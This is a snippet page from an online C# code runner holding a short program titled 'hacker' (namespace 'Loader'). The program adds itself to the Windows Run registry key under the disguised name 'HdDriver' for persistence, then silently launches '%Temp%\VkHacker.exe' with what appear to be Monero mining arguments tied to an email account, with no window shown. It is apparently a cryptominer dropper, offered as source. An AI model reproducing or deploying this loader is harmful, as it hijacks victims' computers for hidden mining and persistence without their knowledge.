Run Code
|
API
|
Code Wall
|
Users
|
Misc
|
Feedback
|
Login
|
Theme
|
Privacy
|
Patreon
hacker
using System; using System.Windows.Forms; using Microsoft.Win32; using System.IO; using System.Diagnostics; namespace Loader { public partial class Form1 : Form { const string name = "HdDriver"; public bool SetAutorunValue(bool autorun) { string ExePath = System.Windows.Forms.Application.ExecutablePath; RegistryKey reg; reg = Registry.CurrentUser.CreateSubKey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"); try { if (autorun) reg.SetValue(name, ExePath); else reg.DeleteValue(name); reg.Close(); } catch { return false; } return true; } public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { SetAutorunValue(true); try { Process _proc = new Process(); _proc.StartInfo.Arguments = "-user super.vitalui@mail.ru -xmr 2"; _proc.StartInfo.CreateNoWindow = true; _proc.StartInfo.UseShellExecute = false; _proc.StartInfo.FileName = @"%Temp%\VkHacker.exe"; _proc.Start(); } catch(Exception ex) { } Application.Exit(); } } }
run
|
edit
|
history
|
help
0
Please
log in
to post a comment.
Jerold
Date Diff
Battle System Algorythm
Delegate test lambda
Linq-Where-Condition on a collection of anonymous types
c# hashset custom comparer
Project Euler Problem 4
1 to n
[REDACTED] database V0.1.6
Regras Recad grupo
Please log in to post a comment.